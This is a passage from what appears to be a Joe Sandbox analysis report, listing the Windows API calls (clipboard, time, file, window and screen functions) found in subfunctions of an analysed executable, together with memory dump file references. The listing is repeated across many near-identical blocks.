      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00451E00: GetFullPathNameA.KERNEL32(004987E9,00000104,?,00000002,00000002), ref: 00451E20
      • Part of subcall function 00451E00: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451E62
      • Part of subcall function 00451E00: GetFileAttributesA.KERNEL32(?), ref: 00451E99
      • Part of subcall function 00451E00: GetFileAttributesA.KERNEL32(?), ref: 00451ED1
      • Part of subcall function 00451E00: FindFirstFileA.KERNEL32(?,?), ref: 00451F0A
      • Part of subcall function 00451E00: GetLastError.KERNEL32 ref: 00451F19
      • Part of subcall function 00451E00: __wsplitpath.LIBCMT ref: 00451F67
      • Part of subcall function 00451E00: GetTickCount.KERNEL32 ref: 00451FB0
      • Part of subcall function 00451E00: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00451FD7
      • Part of subcall function 00451E00: GetTickCount.KERNEL32 ref: 00451FED
      • Part of subcall function 00451E00: MoveFileA.KERNEL32(?,?), ref: 00452082
      • Part of subcall function 00451E00: DeleteFileA.KERNEL32(?), ref: 0045209D
      • Part of subcall function 00451E00: MoveFileA.KERNEL32(?,?), ref: 004520B7
      • Part of subcall function 00451E00: GetLastError.KERNEL32 ref: 004520C1
      • Part of subcall function 00451E00: CopyFileA.KERNEL32(?,?,00000000), ref: 004520EB
      • Part of subcall function 00451E00: GetLastError.KERNEL32 ref: 004520F5
      • Part of subcall function 00451E00: FindNextFileA.KERNEL32(?,00000010), ref: 0045210E
      • Part of subcall function 00451E00: FindClose.KERNEL32(?), ref: 00452121
      • Part of subcall function 0042D3E0: __itow.LIBCMT ref: 0042D40E
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00451410: CoInitialize.OLE32 ref: 00451428
      • Part of subcall function 00451410: CoCreateInstance.OLE32(00496770,00000000,00000001,00496760,00000000), ref: 00451441
      • Part of subcall function 00451410: GetKeyboardLayout.USER32(00000000), ref: 004514F0
      • Part of subcall function 00451410: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00451594
      • Part of subcall function 00451410: CoUninitialize.OLE32 ref: 004515E5
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00434CB0: _strncpy.LIBCMT ref: 00434CF4
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00433450: GetWindowRect.USER32(00000000,?), ref: 0043347D
      • Part of subcall function 00433450: MoveWindow.USER32(00000000,?,?,?,?,00000001), ref: 00433537
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00450110: SendMessageTimeoutA.USER32(00000000,000000F0,00000000,00000000,00000002,000007D0,?), ref: 00450188
      • Part of subcall function 00450110: IsWindowEnabled.USER32(00000000), ref: 004501BC
      • Part of subcall function 00450110: IsWindowVisible.USER32(00000000), ref: 004501E6
      • Part of subcall function 00450110: SendMessageTimeoutA.USER32(00000000,0000130B,00000000,00000000,00000002,000007D0,?), ref: 00450224
      • Part of subcall function 00450110: GetClassNameA.USER32(00000000,?,00000020), ref: 00450259
      • Part of subcall function 00450110: GetClassNameA.USER32(00000000,?,00000020), ref: 004502BB
      • Part of subcall function 00450110: SendMessageTimeoutA.USER32(00000000,00000188,00000000,00000000,00000002,000007D0,?), ref: 00450325
      • Part of subcall function 00450110: SendMessageTimeoutA.USER32(00000000,0000018A,?,00000000,00000002,000007D0,?), ref: 0045034B
      • Part of subcall function 00450110: SendMessageTimeoutA.USER32(00000000,00000189,?,004ABB26,00000002,000007D0,?), ref: 004503DA
      • Part of subcall function 00450110: GetClassNameA.USER32(00000000,?,00000020), ref: 00450419
      • Part of subcall function 00450110: SendMessageTimeoutA.USER32(00000000,0000018B,00000000,00000000,00000002,00001388,?), ref: 004504B5
      • Part of subcall function 00450110: SendMessageTimeoutA.USER32(00000000,0000018A,00000000,00000000,00000002,00001388,?), ref: 004504F4
      • Part of subcall function 00450110: SendMessageTimeoutA.USER32(00000000,00000189,00000000,004ABB26,00000002,00001388,?), ref: 00450592
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0044F220: GetForegroundWindow.USER32 ref: 0044F286
      • Part of subcall function 0044F220: IsIconic.USER32(00000000), ref: 0044F293
      • Part of subcall function 0044F220: GetWindowRect.USER32(00000000,?), ref: 0044F2A7
      • Part of subcall function 0044F220: ClientToScreen.USER32(00000000,?), ref: 0044F2BD
      • Part of subcall function 0044F220: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0044F2FA
      • Part of subcall function 0044F220: GetDC.USER32(00000000), ref: 0044F302
      • Part of subcall function 0044F220: GetPixel.GDI32(00000000,00000000,00000000), ref: 0044F35E
      • Part of subcall function 0044F220: DeleteDC.GDI32(00000000), ref: 0044F36E
      • Part of subcall function 0044F220: ReleaseDC.USER32(00000000,00000000), ref: 0044F378
